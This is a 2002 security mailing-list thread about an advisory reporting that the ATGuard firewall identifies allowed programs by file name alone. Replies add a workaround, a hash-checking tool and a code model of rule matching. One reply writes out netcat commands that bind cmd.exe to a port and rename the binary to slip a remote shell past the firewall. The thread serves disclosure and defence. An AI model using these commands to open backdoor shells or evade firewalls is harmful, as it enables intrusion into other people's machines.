Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

2002-04-30 Thread BlueScreen

As far as I see, the article you gave me at tooleaky.zensoft.com mostly deals
with outbound connections.
The ATGuard problem still goes further: it is also a problem with inbound
connections.

I use a Xitami Webserver on Port 50080 for testing purposes.
This Xitami Webserver is (currently) allowed to accept all connections on
all ports (this is also a configuration problem,
but most people just allow inbound connections from any address to any port
for an application).

So, I just did the following:

I:\>cd netcat

I:\netcat>nc -e c:\winnt\system32\cmd.exe -p 500 -l

I tried to connect to port 500 with telnet: ATGuard fires up as it is
supposed to. So, now I did the following:

I:\netcat>copy nc.exe xiwin32.exe
1 Datei(en) kopiert. (Translation for the curious non-German
readers: 1 file copied :)

I:\netcat>xiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l

Trying it with telnet again, I got a very nice shell without any notice from
ATGuard.

That's why I also mentioned trojan horses in my advisories - just renaming
your trojan horse to the name of a program that is allowed
to accept inbound connections will do the trick.

 There is no ultimate way to control all outbound communication. If you use
 your own low-level drivers, no personal firewall can stop you.

Surely there is no ultimate way. But if you are not aware that a problem
exists, you can't think about solutions.
Also, you will perhaps think that your personal firewall is perfectly safe
while it isn't.

Best regards,



---
BlueScreen / Florian Hobelsberger (UIN: 101782087)
Member of:
www.IT-Checkpoint.net
www.Hackeinsteiger.de
www.DvLdW.de

==
To encrypt classified messages, please download and use this PGP-Key:

http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt
==




Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

2002-04-30 Thread UMusBKidN

Hi,

Ye Olde Disclaimer: The information contained in this email is believed to be true. 
However, exhaustive regression testing has not been performed. No guarantees or 
warranties are implicitly or explicitly granted. Use the information within at your 
own risk.

Tested AtGuard version: 3.21.05
Tested OS's: NT4 SP6a, Win95 (don't hit me, I'm cheap)

BlueScreen wrote:
 
 - 
 itcp advisory 13 [EMAIL PROTECTED]
 http://www.it-checkpoint.net/advisory/12.html
 April 29th, 2002
 - 
 
 ITCP Advisory 13: Bypassing of ATGuard Firewall possible
 - -

*snip*

 DETAILS
*snip*
 Sadly ATGuard doesn't save the file paths / doesn't use checksums (would be
 much better), to
 determine whether the executed program is really the one, that is allowed to
 connect to all hosts on port 80.
 It just uses the filename (in this case IEXPLORE.EXE).

Only if you've created your rule in interactive learning mode. See discussion below.

*snip*

 SOLUTION
 
 There doesn't exist a solution, since ATGuard is not developed anymore. We
 were not able to test the Norton Personal Firewall
 for this problem, since no one of us owns it. We are contacting Norton
 directly with this Advisory.

Not quite correct. The bug reported in BlueScreen's advisory does exist. However, 
either the method of testing was incomplete, or the report was incomplete. Also, there 
is a workaround.

AtGuard has the ability to create firewall rules on the fly (in its interactive 
learning mode). When a connection is attempted and AtGuard cannot find a matching 
rule, in interactive learning mode the user is presented with a window containing 
four options. Two of those options allow the user to specify whether the connection 
should be allowed or blocked, this one time only. The other two of those options allow 
the user to create a rule for particular connections (that may either block or allow 
the connections). This works on either incoming or outgoing connections.

When a rule is created in interactive learning mode, *only the application executable 
name* is stored in the rulebase. This is the bug that BlueScreen pointed out. Without 
a path to the application file in the rulebase, any application with a similar name 
can make use of the firewall rule (block or allow, as the case may be).

However, AtGuard also allows the user to create their own firewall rules manually. 
Click on the dashboard or tray icon, and launch the Settings menu item. Click the 
Add button, create a rule, and make sure you specify an application that the rule 
applies to (on the Application tab, click Application Shown Above, click the Browse 
button, and specify the proper application with the File Dialog box). You will find 
the full path to the file specified in the rule. Shut down your machine, and start it 
up again, and you'll find the full path still there. You can verify the full path in 
the registry under the key:

HKEY_LOCAL_MACHINE\SOFTWARE\WRQ\IAM\FirewallObjects\Applications

Workaround: Manually create firewall rules instead of using interactive learning mode 
to create rules. If you do use interactive learning mode, you should reopen the 
Settings menu, and manually adjust the Application Shown Above so it shows the 
full path to the application that the rule applies to (you apparently don't have to 
trash all your current rules). This *appears* to resolve the issue (from my brief 
testing, YMMV).

Of course, this still wouldn't prevent someone from replacing the specified file with 
malware. However, if your machine has been compromised to that level, it seems to me 
you've got more to worry about than a few firewall rules :/

It should be noted that AtGuard rules may be created that allow or block access to 
*all* applications. Such rules appear to not be affected by this bug.

 ADDITIONAL INFORMATION
 Vendor has not been contacted. (since he doesn't exist anymore).

Actually, the original vendor does exist: http://www.wrq.com. They simply don't sell 
the product any more. From what I can tell, the original firewall has been 
sufficiently morphed by Symantec so that it no longer has much resemblance to AtGuard. 
Thus, I don't think comparisons between products from these two vendors are fair or 
valid.

-UMus B. KidN




Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

2002-04-30 Thread Jonas Koch

Most products use checksums to detect replaced or modified applications.

But there are other problems with outbound filters. Most personal firewalls
do not detect if a malicious program uses a 'trusted' application to
transmit data (look at tooleaky.zensoft.com). I have tested several products
with a method similar to Bob Sundling's and only BlackICE PC Protection 3.5
stopped communication (Norton PF, Tiny PF and ZoneAlarm did not stop it).

There is no ultimate way to control all outbound communication. If you use
your own low-level drivers, no personal firewall can stop you.

Jonas




Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

2002-04-30 Thread Jim Hill

BlueScreen in 014401c1ef8d$1bb66510$0100a8c0@BlueScreenPrimary:

 ATGuard can be fooled to think that a disallowed program is allowed to
 connect to the internet.

This is a well known problem and has been discussed at length on
http://grc.com/lt/scoreboard.htm.

A.M. Janssen has written a utility which monitors the hashes (SHA1,
RIPEMD-160 or HAVAL) for the applications in AtGuard's ruleset:
http://www.capimonitor.nl/nisfilecheck11.zip

It has to be separately scheduled so it's not as good as real
time checks by the firewall but very useful nonetheless.
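The two rule-matching styles discussed in this thread, modelled as an added example that is not part of the thread, of AtGuard, or of the nisfilecheck utility: a learning-mode style rule that keys on the executable name only, beside a manual-rule style check that requires the full path and, in the spirit of the hash monitor, a hash of the file that still matches the baseline taken when the rule was created. The directory layout, file contents and rule structure are constructed for the demonstration; real AtGuard rules live in the registry key quoted above, not in a Python list.

```python
import hashlib
import os
import tempfile

def sha256_file(path):
    """Hash the executable so an in-place replacement is also caught."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def norm(path):
    return os.path.normcase(os.path.abspath(path))

def allowed_by_name(rules, exe_path):
    """Learning-mode style rule: matches on the executable name only."""
    name = os.path.basename(exe_path).upper()
    return any(r["name"].upper() == name for r in rules)

def allowed_by_path_and_hash(rules, exe_path):
    """Manual-rule style: full path must match and the file hash must equal the baseline."""
    for r in rules:
        if norm(r["path"]) == norm(exe_path):
            return r["sha256"] == sha256_file(exe_path)
    return False

def demo():
    """Constructed scenario: genuine browser, same-named copy elsewhere, then in-place overwrite."""
    base = tempfile.mkdtemp()
    genuine = os.path.join(base, "ie", "IEXPLORE.EXE")
    renamed = os.path.join(base, "tunnel", "IEXPLORE.EXE")
    for p, body in ((genuine, b"browser"), (renamed, b"tunnel client")):
        os.makedirs(os.path.dirname(p))
        with open(p, "wb") as f:
            f.write(body)
    # Rule created for the genuine browser, with its hash recorded as baseline.
    rules = [{"name": "IEXPLORE.EXE", "path": genuine, "sha256": sha256_file(genuine)}]
    results = {
        "genuine_name": allowed_by_name(rules, genuine),
        "genuine_strict": allowed_by_path_and_hash(rules, genuine),
        "renamed_name": allowed_by_name(rules, renamed),      # name-only check passes
        "renamed_strict": allowed_by_path_and_hash(rules, renamed),
    }
    with open(genuine, "wb") as f:  # the allowed file itself is replaced in place
        f.write(b"tunnel client")
    results["replaced_name"] = allowed_by_name(rules, genuine)
    results["replaced_strict"] = allowed_by_path_and_hash(rules, genuine)
    return results
```

The path check alone would still pass the overwritten file; only the hash comparison distinguishes it, which is the gap a scheduled hash monitor narrows but does not close between runs.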




ITCP Advisory 13: Bypassing of ATGuard Firewall possible

2002-04-29 Thread BlueScreen


- 
itcp advisory 13 [EMAIL PROTECTED]
http://www.it-checkpoint.net/advisory/12.html
April 29th, 2002
- 



ITCP Advisory 13: Bypassing of ATGuard Firewall possible
- -

Affected programs:  ATGuard Personal Firewall (At least Version 3.2,
probably others)
URL: Not existent any more, the software is still widespread
Vendor: The ATGuard technology was bought by Norton and included in its
Norton Personal Firewall
Vulnerability-Class: Bypassing of a personal Firewall (Desktop Firewall)
OS specific: Windows
Problem-Type: local and remote


SUMMARY

ATGuard is a very good personal desktop firewall, which comes with a wide
range of possibilities:

- Firewall functions
- Webfilter functions
- Privacy protection functions

It is also possible, to allow specific connections bound to applications
(for example, you can allow all connections
to Port 80 on any host for Internet Explorer).

Further, it is possible to protect the firewall configuration (and start/stop
of it) with a password. This could be a great
possibility to control the activities of children and youths on the
internet.


DETAILS

As mentioned before, it is possible to allow specific connections for
specific applications.
For example, most users use Internet Explorer to browse the internet.
It is a logical assumption that people using the Internet Explorer to
browse the WWW allow
outbound connections to all hosts at least to the destination port 80.
Sadly ATGuard doesn't save the file paths / doesn't use checksums (would be
much better), to
determine whether the executed program is really the one, that is allowed to
connect to all hosts on port 80.
It just uses the filename (in this case IEXPLORE.EXE).


IMPACT

ATGuard can be fooled to think that a disallowed program is allowed to
connect to the internet.
Trojan horses which use outbound connections or use
HTTP tunneling software to tunnel unwanted
connections (like ICQ) are not blocked.

EXPLOIT

There are many different possibilities to exploit this. This is a sample how
to get ICQ working on a computer,
on which only Internet Explorer is allowed to connect to port 80. All other
outbound connections are blocked by ATGuard.

Download the HTTP-Tunnel client from www.HTTP-Tunnel.com. Install it on your
computer.
When you try to configure it, it will tell you that it can't find the
HTTP-Tunnel server.

Now, just rename / copy the file HTTP-Tunnel Client.exe to IEXPLORE.EXE.
Fire it up again using the IEXPLORE.EXE filename. After a short time it should
tell you that it is working correctly.

As said before, it is possible to use trojan horses to fool badly configured
firewalls, etc...

SOLUTION

There doesn't exist a solution, since ATGuard is not developed anymore. We
were not able to test the Norton Personal Firewall
for this problem, since no one of us owns it. We are contacting Norton
directly with this Advisory.


ADDITIONAL INFORMATION
Vendor has not been contacted. (since he doesn't exist anymore).

Since there exist more personal firewalls like ATGuard, we will have a look
at the free ones and try the same.



Bugs discovered and published by Florian "BlueScreen" Hobelsberger
( [EMAIL PROTECTED] ) from
www.IT-Checkpoint.net



---
DISCLAIMER:
The information in this bulletin is provided AS IS without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.